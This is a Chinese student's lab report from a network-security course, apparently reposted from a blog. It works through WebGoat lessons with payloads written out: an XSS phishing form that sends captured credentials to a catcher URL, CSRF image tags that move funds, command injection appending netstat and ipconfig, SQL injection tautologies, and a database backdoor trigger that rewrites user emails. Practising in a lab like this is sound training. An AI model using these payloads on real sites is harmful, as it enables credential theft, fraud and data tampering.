20145239杜文超《网络对抗》- Web安全基础实践

基础问题回答

(1)SQL注入攻击原理,如何防御?

  • SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令的目的。

  • 防御:利用输入规则限制进行防御,过滤输入的数据,不允许特殊字符输入。

(2)XSS攻击的原理,如何防御?

  • 跨站脚本攻击,允许恶意用户将恶意Script代码注入到网页上,当用户浏览网页时,嵌入其中Web里面的Script代码会被执行,从而被攻击,其他用户在观看网页时就会受到影响。XSS攻击的主要目的是,想办法获取目标攻击网站的cookie,因为有了cookie相当于有了seesion,有了这些信息就可以在任意能接进互联网的pc登陆该网站,并以其他人的身份登陆,做一些破坏。

  • 防御:在表单提交或者url参数传递前,对需要的参数进行过滤;检查用户输入的内容中是否有非法内容,如尖括号、引号等,严格控制输出。

(3)CSRF攻击原理,如何防御?

  • CSRF攻击即跨站伪造攻击,顾名思义,就是攻击者向目标网站注入一个恶意的URL跨站地址,当用户点击了该URL,就可以进行一些用户本不希望的事情。
  • 防御:通过referer、token或者验证码来检测用户提交;在form中包含秘密信息、用户指定的代号作为cookie之外的验证;定期清理保存的cookie。

实验总结与体会

跟着组长做第一步的时候一脸懵逼,完全不知道在干什么,在浏览器登陆上wedgoat之后我用我拙劣的英语翻译水平费劲的认识到这恐怕是一个外国的学习安全技术的漏洞实验平台。其实很多内容原理挺简单的,就是还是得好好学英语不然看不懂题目,国内也有类似的如爱春秋之类的信息安全实战平台我们也可以体验学习。还有就是跟着别人的博客做完实验一定要思考为什么是这样,仅仅是按着流程走一遍得到成功结果其实意义并不大。

实践过程记录

实验准备

  WebGoat是OWASP组织研制出的用于进行web漏洞实验的应用平台,用来说明web应用中存在的安全漏洞。WebGoat运行在带有java虚拟机的平台之上,目前提供的训练课程有很多,包含了XSS、线程安全、SQL注入等,我们本次的实验就是在WebGoat平台上进行。

1、输入java -jar webgoat-container-7.0.1-war-exec.jar打开webgoat。

2、在浏览器输入localhost:8080/WebGoat登陆平台。

Phishing with XSS

在搜索框输入如下攻击代码:

</form>
<script>function hack(){ XSSImage=new Image;XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);}
</script>
<form name="phish">
<br>
<br>
<HR><H2>This feature requires account login:</H2>
<br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" name = "pass">
<br><input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>

输入用户名密码,点击登录,WebGoat会将你输入的信息捕获并反馈给你

攻击成功!

Stored XSS Attacks

要求创建非法的消息内容,可以导致其他用户访问时载入非预期的页面或内容。

在message中输入一串代码如<script>alert("20145239 attack succeed!");</script>

提交,弹出窗口,攻击成功!

Reflected XSS Attacks

在code框中输入<script>alert("5239 attack succeed!");</script>将带有攻击性的URL作为输入源。

弹出会话框,反射型XSS攻击成功!

Cross Site Request Forgery

写一个URL诱使其他用户点击,从而触发CSRF攻击,我们可以以图片的的形式将URL放进Message框,这时的URL对其他用户是不可见的,用户一旦点击图片,就会触发一个CSRF事件。

在message框中输入<img src="http://localhost:8080/WebGoat/attack?Screen=270&menu=900&transferFunds=4000"/>

(Screen和menu的值在窗口右边查看)

提交后在下面的Message List里面可以看我刚刚发送的消息,点击它,当前页面就会下载这个消息并显示出来,转走用户的5239元,从而达到CSRF攻击的目的。

CSRF Prompt By-Pass

浏览器开启一个新页面,输入localhost:8080/WebGoat/attack?Screen=1410&menu=900&transferFunds=5000进入确认转账请求页面。

点击CONFIRM之后,再输入localhost:8080/WebGoat/attack?Screen=1410&menu=900&transferFunds=CONFIRM

成功转走了5000元。原因是网页的源代码中transferFunds的值变成了CONFIRM。

Command Injection

题目的要求是:尝试给操作系统注入命令行,要求能够在目标主机上执行系统命令。

通过火狐浏览器下的一个扩展Firebug对源代码进行修改,右键点击BackDoors.help旁边加上 "& netstat -an & ipconfig"

选中修改后的值再点击view,可以看到命令被执行,出现系统网络连接情况:

Numeric SQL Injection

题目大意是这个表单允许使用者看到天气数据,利用SQL注入使得可以看见所有数据。

在103后面加上一个 or 1=1使其成为永真式。

点击Go!发现已经成功了。

String SQL Injection

输入' or 1=1 --构造永真式。点击Go!发现所有用户信息都被显示出来了。

LAB:SQL Injection(Stage 1:String SQL Injection)

输入' or 1=1 --注入,失败。在输入框右键打开html源码,发现maxlength被限制为8。修改成20,再次登陆,成功!

LAB:SQL Injection(Stage 3:Numeric SQL Injection)

在上一个实验的基础上,过一个普通员工的账户larry,浏览其BOSS的账户信息。

在larry的名字右键,打开源码,发现这个地方是以员工ID作为索引传递参数的。将value的值修改为101 or 1=1 order by salary desc --

这样老板的信息就会被排到第一个。

再次点击ViewProfile,发现已经看到老板的信息了。

Database Backdoors

先输入101,得到该用户的信息:

注入语句101; update employee set salary=5239,将其工资变为了5239。

最后输入101;CREATE TRIGGER lxmBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='20145239@qq.com' WHERE userid = NEW.userid把表中所有的邮箱和用户ID都设为我自己的。

转载于:https://www.cnblogs.com/dwc929210354/p/6875446.html

20145239杜文超《网络对抗》- Web安全基础实践相关推荐

  1. 20145239杜文超 《Java程序设计》第7周学习总结

    20145239 <Java程序设计>第7周学习总结 教材学习内容总结 Lambda 认识Lambda语法 Lambda语法概述: Arrays的sort()方法可以用来排序,在使用sor ...

  2. 20145227鄢曼君《网络对抗》Web安全基础实践

    20145227鄢曼君<网络对抗>Web安全基础实践 实验后回答问题 1.SQL注入攻击原理,如何防御? SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是 ...

  3. 20155202《网络对抗》Exp9 web安全基础实践

    20155202<网络对抗>Exp9 web安全基础实践 实验前回答问题 (1)SQL注入攻击原理,如何防御 SQL注入产生的原因,和栈溢出.XSS等很多其他的攻击方法类似,就是未经检查或 ...

  4. 20145325张梓靖 《网络对抗技术》 Web安全基础实践

    20145325张梓靖 <网络对抗技术> Web安全基础实践 实验内容 使用webgoat进行XSS攻击.CSRF攻击.SQL注入 XSS攻击:Stored XSS Attacks.Ref ...

  5. 20145209刘一阳《网络对抗》Exp9 Web安全基础实践

    20145209刘一阳<网络对抗>Exp9 Web安全基础实践 基础问题回答 1.SQL注入攻击原理,如何防御? SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求 ...

  6. 《网络攻防》Web安全基础实践

    20145224陈颢文 <网络攻防>Web安全基础实践 基础问题回答 SQL注入攻击原理,如何防御: 部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,黑客利用这个bug在数 ...

  7. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  8. 20145202马超《网络对抗》Exp5MSF基础应用

    20145202马超<网络对抗>Exp5MSF基础应用 本实践目标,掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...

  9. Exp9 Web安全基础实践 20164323段钊阳

    网络对抗技术 20164323 Exp9 Web安全基础实践 回答问题 (1)SQL注入攻击原理,如何防御 原理:通过在用户名.密码登输入框中输入特殊字符,在处理字符串与sql语句拼接过程中实现引号闭 ...

最新文章

  1. C++负数、小数如何保存
  2. 利用getchar()消除多余字符数据(主要是“回车”)
  3. 深度学习中的batch理解(batch size 一次喂给神经网络的数据大小量)
  4. md5加密 java原理_md5 32位 加密原理 Java实现md5加密
  5. 如何使用Visual studio C++(VC++)编译C?图解,详!!!
  6. JAVA过滤器的使用(Filter)
  7. IOS开发之Post 方式获取服务器数据
  8. 帆软注册文件_注册信息- FineReport帮助文档|报表开发|报表使用|学习教程
  9. 在文华财经赢顺云W6和赢顺云手机随身行中如何导入需要的指标
  10. 杭电ACM2046题
  11. 通用办公报表打印软件
  12. 量化交易----常见股票特征和编程实现
  13. (Network Analysis)graph centrality measures
  14. 创建型模式——建造者模式(Builder Pattern)
  15. 杭州好玩景点攻略76
  16. A+B 问题【OJ 示例题目】
  17. 汇编语言--LC3tools实现两个32位数相加
  18. easyrecovery2023免费版电脑数据恢复软件下载功能介绍
  19. swf转gaf使用方法
  20. 海淘转运攻略之2017年黑色星期五海淘转运公司对比推荐

热门文章

  1. Java开源协同办公OA项目:自己搭建三个办公必备小功能!
  2. 【深入理解计算机系统】 一:数值表示与编码
  3. java 精度函数_Java中的半精度浮点
  4. 解决方法-电脑上打字出现字母分开间隔很大的情况
  5. 关于日语学习方法的总结
  6. matlab车轮滚动动画,flash制作车轮往前滚动的动画效果
  7. 学习Spring必学的Java基础知识----反射
  8. SEER交易所及第三方平台充提网关接入指南
  9. HTML之3D旋转图片
  10. 【C#通过共享内存MemoryMappedFile解码和播放WavPack等PCM音频】